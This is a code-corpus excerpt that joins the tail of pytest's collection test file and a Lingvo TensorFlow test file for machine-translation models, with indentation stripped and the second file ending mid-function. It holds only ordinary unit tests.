assert item2.fspath == item.fspath
def test_find_byid_without_instance_parents(self, testdir):
p = testdir.makepyfile("""
class TestClass:
def test_method(self):
pass
""")
arg = p.basename + ("::TestClass::test_method")
items, hookrec = testdir.inline_genitems(arg)
assert len(items) == 1
item, = items
assert item.nodeid.endswith("TestClass::()::test_method")
class Test_getinitialnodes:
def test_global_file(self, testdir, tmpdir):
x = tmpdir.ensure("x.py")
with tmpdir.as_cwd():
config = testdir.parseconfigure(x)
col = testdir.getnode(config, x)
assert isinstance(col, pytest.Module)
assert col.name == 'x.py'
assert col.parent.name == testdir.tmpdir.basename
assert col.parent.parent is None
for col in col.listchain():
assert col.config is config
def test_pkgfile(self, testdir):
tmpdir = testdir.tmpdir
subdir = tmpdir.join("subdir")
x = subdir.ensure("x.py")
subdir.ensure("__init__.py")
with subdir.as_cwd():
config = testdir.parseconfigure(x)
col = testdir.getnode(config, x)
assert isinstance(col, pytest.Module)
assert col.name == 'x.py'
assert col.parent.parent is None
for col in col.listchain():
assert col.config is config
class Test_genitems:
def test_check_collect_hashes(self, testdir):
p = testdir.makepyfile("""
def test_1():
pass
def test_2():
pass
""")
p.copy(p.dirpath(p.purebasename + "2" + ".py"))
items, reprec = testdir.inline_genitems(p.dirpath())
assert len(items) == 4
for numi, i in enumerate(items):
for numj, j in enumerate(items):
if numj != numi:
assert hash(i) != hash(j)
assert i != j
def test_example_items1(self, testdir):
p = testdir.makepyfile('''
def testone():
pass
class TestX:
def testmethod_one(self):
pass
class TestY(TestX):
pass
''')
items, reprec = testdir.inline_genitems(p)
assert len(items) == 3
assert items[0].name == 'testone'
assert items[1].name == 'testmethod_one'
assert items[2].name == 'testmethod_one'
# let's also test getmodpath here
assert items[0].getmodpath() == "testone"
assert items[1].getmodpath() == "TestX.testmethod_one"
assert items[2].getmodpath() == "TestY.testmethod_one"
s = items[0].getmodpath(stopatmodule=False)
assert s.endswith("test_example_items1.testone")
print(s)
def test_class_and_functions_discovery_using_glob(self, testdir):
"""
tests that python_classes and python_functions config options work
as prefixes and glob-like patterns (issue #600).
"""
testdir.makeini("""
[pytest]
python_classes = *Suite Test
python_functions = *_test test
""")
p = testdir.makepyfile('''
class MyTestSuite:
def x_test(self):
pass
class TestCase:
def test_y(self):
pass
''')
items, reprec = testdir.inline_genitems(p)
ids = [x.getmodpath() for x in items]
assert ids == ['MyTestSuite.x_test', 'TestCase.test_y']
def test_matchnodes_two_collections_same_file(testdir):
testdir.makeconftest("""
import pytest
def pytest_configure(config):
config.pluginmanager.register(Plugin2())
class Plugin2:
def pytest_collect_file(self, path, parent):
if path.ext == ".abc":
return MyFile2(path, parent)
def pytest_collect_file(path, parent):
if path.ext == ".abc":
return MyFile1(path, parent)
class MyFile1(pytest.Item, pytest.File):
def runtest(self):
pass
class MyFile2(pytest.File):
def collect(self):
return [Item2("hello", parent=self)]
class Item2(pytest.Item):
def runtest(self):
pass
""")
p = testdir.makefile(".abc", "")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.fnmatch_lines([
"*2 passed*",
])
res = testdir.runpytest("%s::hello" % p.basename)
res.stdout.fnmatch_lines([
"*1 passed*",
])
class TestNodekeywords:
def test_no_under(self, testdir):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
l = list(modcol.keywords)
assert modcol.name in l
for x in l:
assert not x.startswith("_")
assert modcol.name in repr(modcol.keywords)
def test_issue345(self, testdir):
testdir.makepyfile("""
def test_should_not_be_selected():
assert False, 'I should not have been selected to run'
def test___repr__():
pass
""")
reprec = testdir.inline_run("-k repr")
reprec.assertoutcome(passed=1, failed=0)
COLLECTION_ERROR_PY_FILES = dict(
test_01_failure="""
def test_1():
assert False
""",
test_02_import_error="""
import asdfasdfasdf
def test_2():
assert True
""",
test_03_import_error="""
import asdfasdfasdf
def test_3():
assert True
""",
test_04_success="""
def test_4():
assert True
""",
)
def test_exit_on_collection_error(testdir):
"""Verify that all collection errors are collected and no tests executed"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest()
assert res.ret == 2
res.stdout.fnmatch_lines([
"collected 2 items / 2 errors",
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*ERROR collecting test_03_import_error.py*",
"*No module named *asdfa*",
])
def test_exit_on_collection_with_maxfail_smaller_than_n_errors(testdir):
"""
Verify collection is aborted once maxfail errors are encountered ignoring
further modules which would cause more collection errors.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--maxfail=1")
assert res.ret == 2
res.stdout.fnmatch_lines([
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*Interrupted: stopping after 1 failures*",
])
assert 'test_03' not in res.stdout.str()
def test_exit_on_collection_with_maxfail_bigger_than_n_errors(testdir):
"""
Verify the test run aborts due to collection errors even if maxfail count of
errors was not reached.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--maxfail=4")
assert res.ret == 2
res.stdout.fnmatch_lines([
"collected 2 items / 2 errors",
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*ERROR collecting test_03_import_error.py*",
"*No module named *asdfa*",
])
def test_continue_on_collection_errors(testdir):
"""
Verify tests are executed even when collection errors occur when the
--continue-on-collection-errors flag is set
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--continue-on-collection-errors")
assert res.ret == 1
res.stdout.fnmatch_lines([
"collected 2 items / 2 errors",
"*1 failed, 1 passed, 2 error*",
])
def test_continue_on_collection_errors_maxfail(testdir):
"""
Verify tests are executed even when collection errors occur and that maxfail
is honoured (including the collection error count).
4 tests: 2 collection errors + 1 failure + 1 success
test_4 is never executed because the test run is with --maxfail=3 which
means it is interrupted after the 2 collection errors + 1 failure.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--continue-on-collection-errors", "--maxfail=3")
assert res.ret == 2
res.stdout.fnmatch_lines([
"collected 2 items / 2 errors",
"*Interrupted: stopping after 3 failures*",
"*1 failed, 2 error*",
])
| jaraco/pytest | testing/test_collection.py | Python | mit | 26,378 | 0.000986 |
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MT Models."""
import lingvo.compat as tf
from lingvo.core import base_input_generator
from lingvo.core import base_layer
from lingvo.core import cluster_factory
from lingvo.core import layers
from lingvo.core import optimizer
from lingvo.core import py_utils
from lingvo.core import schedule
from lingvo.core import test_helper
from lingvo.core import test_utils
from lingvo.tasks.mt import decoder
from lingvo.tasks.mt import encoder
from lingvo.tasks.mt import input_generator
from lingvo.tasks.mt import model
import numpy as np
FLAGS = tf.flags.FLAGS
_TF_RANDOM_SEED = 93820986
class TestInputGenerator(base_input_generator.BaseSequenceInputGenerator):
@classmethod
def Params(cls):
p = super().Params()
p.Define('split', True, '')
return p
def __init__(self, params):
super().__init__(params)
self._step = 0
def InfeedBatchSize(self):
if self.params.split:
return 10 / 2
return 10
def _InputBatch(self):
np.random.seed(1)
bs, sl = 10, 7
src_ids = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_ids = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_labels = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_weights = tf.constant(np.ones(shape=[bs, sl], dtype=np.float32))
src_paddings = tf.zeros([bs, sl])
tgt_paddings = tf.zeros([bs, sl])
ret = py_utils.NestedMap()
ret.src = py_utils.NestedMap()
ret.tgt = py_utils.NestedMap()
if self.params.split:
src_ids = tf.split(src_ids, 2, 0)
src_paddings = tf.split(src_paddings, 2, 0)
tgt_ids = tf.split(tgt_ids, 2, 0)
tgt_labels = tf.split(tgt_labels, 2, 0)
tgt_paddings = tf.split(tgt_paddings, 2, 0)
tgt_weights = tf.split(tgt_weights, 2, 0)
ret.src.ids = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: src_ids[0], lambda: src_ids[1])
ret.src.paddings = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: src_paddings[0], lambda: src_paddings[1])
ret.tgt.ids = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_ids[0], lambda: tgt_ids[1])
ret.tgt.labels = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_labels[0], lambda: tgt_labels[1])
ret.tgt.paddings = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_paddings[0], lambda: tgt_paddings[1])
ret.tgt.weights = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_weights[0], lambda: tgt_weights[1])
else:
ret.src.ids = src_ids
ret.src.paddings = src_paddings
ret.tgt.ids = tgt_ids
ret.tgt.labels = tgt_labels
ret.tgt.paddings = tgt_paddings
ret.tgt.weights = tgt_weights
return ret
class TransformerModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _EncoderParams(self):
p = encoder.TransformerEncoder.Params()
p.name = 'encoder'
p.random_seed = 1234
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.transformer_stack.transformer_tpl.tr_atten_tpl.num_attention_heads = 2
p.transformer_stack.transformer_tpl.tr_fflayer_tpl.hidden_dim = 5
return p
def _DecoderParams(self):
p = decoder.TransformerDecoder.Params()
p.name = 'decoder'
p.random_seed = 1234
p.source_dim = 4
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.trans_tpl.source_dim = 4
p.trans_tpl.tr_atten_tpl.source_dim = 4
p.trans_tpl.tr_atten_tpl.num_attention_heads = 2
p.trans_tpl.tr_fflayer_tpl.input_dim = 4
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 8
p.softmax.num_shards = 1
p.target_seq_len = 5
return p
def _testParams(self):
p = model.TransformerModel.Params()
p.name = 'test_mdl'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.train.learning_rate = 2e-4
return p
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
print('vars = ', mdl.vars)
flatten_vars = mdl.vars.Flatten()
print('vars flattened = ', flatten_vars)
self.assertEqual(len(flatten_vars), 238)
# Should match tf.trainable_variables().
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFProp(self, dtype=tf.float32, fprop_dtype=tf.float32):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.dtype = dtype
if fprop_dtype:
p.fprop_dtype = fprop_dtype
p.input.dtype = fprop_dtype
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.99771, 10.377038], [243.92978, 10.379991],
[260.7751, 10.379107], [201.10846, 10.379791],
[272.22006, 10.370288]])
def testFPropEvalMode(self):
with self.session(), self.SetEval(True):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = ', vals)
self.assertAllClose(vals, [(226.99771, 10.377038), (243.92978, 10.379991),
(260.7751, 10.379107), (201.10846, 10.379791),
(272.22006, 10.370288)])
def testBProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp, mdl.train_op))[:2]]
print('BProp actual vals = ', vals)
expected_vals = [(226.99771, 10.377038), (243.87854, 10.3778105),
(260.66788, 10.374841), (200.94312, 10.371258),
(271.9328, 10.3593445)]
self.assertAllClose(vals, expected_vals)
def testBPropWithAccumComparison(self):
def _SetDefaults(p):
p.random_seed = 12345
p.decoder.input_dropout_prob = 0.0
mp = p.encoder.transformer_stack.transparent_merger_tpl
mp.weighted_merger_dropout_prob = 0.0
disable_vn = py_utils.VariationalNoiseParams(1.0, False, False)
for lp in base_layer.RecursiveFindLayerParams(p):
# TODO(lepikhin): lp.dtype = dtype
lp.params_init = py_utils.WeightInit.Gaussian(0.1, 12345)
lp.vn = disable_vn
tp = p.train
assert tp.l2_regularizer_weight is None
tp.clip_gradient_norm_to_value = False
tp.grad_norm_to_clip_to_zero = False
tp.optimizer = optimizer.SGD.Params()
tp.learning_rate = 1e-2
tp.lr_schedule = schedule.ContinuousSchedule.Params()
for l in p.ToText().split('\n'):
print(l)
return p
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.input = TestInputGenerator.Params()
p.input.split = True
p = _SetDefaults(p)
p.train.optimizer = optimizer.Accumulator.Params().Set(
accum_steps=2, optimizer_tpl=p.train.optimizer)
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
self.evaluate(tf.global_variables_initializer())
for _ in range(2):
self.evaluate(mdl.train_op)
expected = self.evaluate(mdl.dec.softmax.vars['weight_0'])
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.input = TestInputGenerator.Params()
p.input.split = False
p = _SetDefaults(p)
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
self.evaluate(tf.global_variables_initializer())
self.evaluate(mdl.train_op)
actual = self.evaluate(mdl.dec.softmax.vars['weight_0'])
self.assertAllClose(expected, actual, rtol=1e-2, atol=1e-2)
def testBatchSplit(self):
def Run(num_splits):
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(93820981)
p = self._testParams()
p.input.bucket_batch_limit = [
b * 2 / num_splits for b in p.input.bucket_batch_limit
]
with cluster_factory.ForTestingWorker(gpus=num_splits):
mdl = p.Instantiate()
metrics = mdl.FPropDefaultTheta()[0]
self.evaluate(tf.global_variables_initializer())
return self.evaluate(metrics['loss'])
res1, res2 = Run(1), Run(2)
self.assertAllClose(res1[0], res2[0])
self.assertAllEqual(res1[1], res2[1])
def testBatchSizeInInputGenerator(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
with cluster_factory.ForTestingWorker(
mode='sync', job='trainer_client', gpus=5):
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
self.evaluate(tf.global_variables_initializer())
_ = self.evaluate(loss)
self.assertEqual(mdl.input_generator.infeed_bucket_batch_limit, [40])
def testDecode(self):
with self.session(use_gpu=False):
tf.random.set_seed(93820985)
p = self._testParams()
mdl = p.Instantiate()
input_batch = mdl.input_generator.GetPreprocessedInputBatch()
dec_out_dict = mdl.Decode(input_batch)
self.evaluate(tf.global_variables_initializer())
dec_out = self.evaluate(dec_out_dict)
metrics_dict = mdl.CreateDecoderMetrics()
key_value_pairs = mdl.PostProcessDecodeOut(dec_out, metrics_dict)
self.assertNear(0.0, metrics_dict['corpus_bleu'].value, 1.0e-5)
self.assertLen(key_value_pairs, 8)
for k, v in key_value_pairs:
self.assertIn(k, v)
class RNMTModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _EncoderParams(self):
p = encoder.MTEncoderBiRNN.Params()
p.name = 'encoder'
p.emb.vocab_size = 32000
p.emb.embedding_dim = 4
p.emb.max_num_shards = 1
p.lstm_cell_size = 4
p.num_lstm_layers = 3
p.encoder_out_dim = 4
return p
def _DecoderParams(self):
p = decoder.MTDecoderV1.Params()
p.name = 'decoder'
p.source_dim = 4
p.emb.vocab_size = 32000
p.emb.embedding_dim = 4
p.emb.max_num_shards = 1
p.rnn_cell_dim = 4
p.rnn_layers = 3
p.attention.hidden_dim = 2
p.softmax.num_classes = 32000
p.softmax.num_shards = 1
return p
def _testParams(self):
p = model.RNMTModel.Params()
p.name = 'test_mdl'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.train.learning_rate = 1.0
return p
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
flatten_vars = mdl.vars.Flatten()
# encoder/embedding: 1
# encoder/lstms: 2 * (3 (forward) + 3 (backward))
# encoder/proj: 2
# decoder/embedding: 1
# decoder/atten: 3
# decoder/lstms: 2 * 3
# decoder/softmax: 2
self.assertEqual(len(flatten_vars), 1 + 12 + 2 + 1 + 3 + 6 + 2)
# Should match tf.trainable_variables().
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.92014, 10.373492], [243.77704, 10.373491],
[260.63403, 10.373494], [200.98639, 10.373491],
[272.30417, 10.373492]])
def testFPropEvalMode(self):
with self.session(), self.SetEval(True):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.92014, 10.373492], [243.77704, 10.373491],
[260.63403, 10.373494], [200.98639, 10.373491],
[272.30417, 10.373492]])
def testBProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp, mdl.train_op))[:2]]
print('bprop actual vals = %s' % np.array_repr(np.array(vals)))
expected_vals = [
[226.92014, 10.373492],
[225.25146, 9.585169],
[248.49757, 9.8904505],
[212.02884, 10.943424],
[314.57098, 11.983657],
]
self.assertAllClose(vals, expected_vals, atol=1e-3)
def testDecode(self):
with self.session(use_gpu=False), self.SetEval(True):
tf.random.set_seed(93820985)
p = self._testParams()
mdl = p.Instantiate()
input_batch = mdl.input_generator.GetPreprocessedInputBatch()
dec_out_dict = mdl.Decode(input_batch)
self.evaluate(tf.global_variables_initializer())
dec_out = self.evaluate(dec_out_dict)
metrics_dict = mdl.CreateDecoderMetrics()
key_value_pairs = mdl.PostProcessDecodeOut(dec_out, metrics_dict)
self.assertNear(0.0, metrics_dict['corpus_bleu'].value, 1.0e-5)
self.assertLen(key_value_pairs, 8)
for k, v in key_value_pairs:
self.assertIn(k, v)
def testBatchSplit(self):
def Run(num_splits):
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(93820981)
p = self._testParams()
p.input.bucket_batch_limit = [
b * 2 / num_splits for b in p.input.bucket_batch_limit
]
with cluster_factory.ForTestingWorker(gpus=num_splits):
mdl = p.Instantiate()
metrics = mdl.FPropDefaultTheta()[0]
self.evaluate(tf.global_variables_initializer())
return self.evaluate(metrics['loss'])
res1, res2 = Run(1), Run(2)
self.assertAllClose(res1[0], res2[0])
self.assertAllEqual(res1[1], res2[1])
def testBatchSizeInInputGenerator(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
cluster_params = cluster_factory.Cluster.Params()
cluster_params.mode = 'sync'
cluster_params.job = 'trainer_client'
cluster_params.worker.name = '/job:localhost'
cluster_params.worker.gpus_per_replica = 5
cluster_params.input.name = '/job:localhost'
cluster_params.input.replicas = 1
cluster_params.input.gpus_per_replica = 0
with cluster_params.Instantiate():
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
self.evaluate(tf.global_variables_initializer())
_ = self.evaluate(loss)
self.assertEqual(mdl.input_generator.infeed_bucket_batch_limit, [40])
class HybridModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _EncoderParams(self):
p = encoder.TransformerEncoder.Params()
p.name = 'encoder'
p.random_seed = 1234
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.transformer_stack.transformer_tpl.tr_atten_tpl.num_attention_heads = 2
p.transformer_stack.transformer_tpl.tr_fflayer_tpl.hidden_dim = 5
return p
def _DecoderParams(self):
p = decoder.MTDecoderV1.Params()
p.name = 'decoder'
p.source_dim = 4
p.emb.vocab_size = 32000
p.emb.embedding_dim = 4
p.emb.max_num_shards = 1
p.rnn_cell_dim = 4
p.rnn_layers = 3
p.attention.hidden_dim = 2
p.softmax.num_classes = 32000
p.softmax.num_shards = 1
return p
def _testParams(self):
p = model.HybridModel.Params()
p.name = 'test_mdl'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.train.learning_rate = 1.0
return p
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
flatten_vars = mdl.vars.Flatten()
print('vars flattened = ', flatten_vars)
# encoder: 91 (1 + 36 + 54)
# encoder/embedding: 1
# encoder/ff_layer: 6 * 6
# encoder/attention: 9 * 6
# decoder: 12 (1 + 3 + 6 + 2)
# decoder/embedding: 1
# decoder/atten: 3
# decoder/lstms: 2 * 3
# decoder/softmax: 2
self.assertEqual(len(flatten_vars), 91 + 12)
# Should match tf.trainable_variables().
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.91527, 10.373269], [243.76906, 10.373152],
[260.62787, 10.373248], [200.98814, 10.373582],
[272.297, 10.373219]])
def testFPropEvalMode(self):
with self.session(), self.SetEval(True):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.91527, 10.373269], [243.76906, 10.373152],
[260.62787, 10.373248], [200.98814, 10.373582],
[272.297, 10.373219]])
def testBProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp, mdl.train_op))[:2]]
print('bprop actual vals = %s' % np.array_repr(np.array(vals)))
expected_vals = [[226.91527, 10.373269], [222.4018, 9.463906],
[248.72293, 9.89942], [181.65323, 9.37565],
[312.97754, 11.922954]]
self.assertAllClose(vals, expected_vals, atol=1e-3)
def testDecode(self):
with self.session(use_gpu=False), self.SetEval(True):
tf.random.set_seed(93820985)
p = self._testParams()
mdl = p.Instantiate()
input_batch = mdl.input_generator.GetPreprocessedInputBatch()
dec_out_dict = mdl.Decode(input_batch)
self.evaluate(tf.global_variables_initializer())
dec_out = self.evaluate(dec_out_dict)
metrics_dict = mdl.CreateDecoderMetrics()
key_value_pairs = mdl.PostProcessDecodeOut(dec_out, metrics_dict)
self.assertNear(0.0, metrics_dict['corpus_bleu'].value, 1.0e-5)
self.assertLen(key_value_pairs, 8)
for k, v in key_value_pairs:
self.assertIn(k, v)
def testBatchSplit(self):
def Run(num_splits):
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(93820981)
p = self._testParams()
p.input.bucket_batch_limit = [
b * 2 / num_splits for b in p.input.bucket_batch_limit
]
with cluster_factory.ForTestingWorker(gpus=num_splits):
mdl = p.Instantiate()
metrics = mdl.FPropDefaultTheta()[0]
self.evaluate(tf.global_variables_initializer())
return self.evaluate(metrics['loss'])
res1, res2 = Run(1), Run(2)
self.assertAllClose(res1[0], res2[0])
self.assertAllEqual(res1[1], res2[1])
def testBatchSizeInInputGenerator(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
cluster_params = cluster_factory.Cluster.Params()
cluster_params.mode = 'sync'
cluster_params.job = 'trainer_client'
cluster_params.worker.name = '/job:localhost'
cluster_params.worker.gpus_per_replica = 5
cluster_params.input.name = '/job:localhost'
cluster_params.input.replicas = 1
cluster_params.input.gpus_per_replica = 0
with cluster_params.Instantiate():
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
self.evaluate(tf.global_variables_initializer())
_ = self.evaluate(loss)
self.assertEqual(mdl.input_generator.infeed_bucket_batch_limit, [40])
class InsertionModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _DecoderParams(self):
p = decoder.InsertionDecoder.Params()
p.name = 'decoder'
return p
def _testParams(self):
p = model.InsertionModel.Params()
p.name = 'insertion'
p.input = self._InputParams()
p.decoder = self._DecoderParams()
p.random_seed = 12345
return p
def testSampleCanvasAndTargets(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
x = np.asarray([[10, 11, 12, 13, 14, 15, 2], [10, 11, 12, 13, 14, 15, 2],
[2, 0, 0, 0, 0, 0, 0], [10, 11, 12, 13, 14, 2, 0]],
np.int32)
x_paddings = np.asarray([[0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1]],
np.float32)
p = self._testParams()
mdl = p.Instantiate()
descriptor = mdl._SampleCanvasAndTargets(
tf.convert_to_tensor(x), tf.convert_to_tensor(x_paddings))
canvas, canvas_paddings, target_indices, target_weights = self.evaluate([
descriptor.canvas, descriptor.canvas_paddings,
descriptor.target_indices, descriptor.target_weights
])
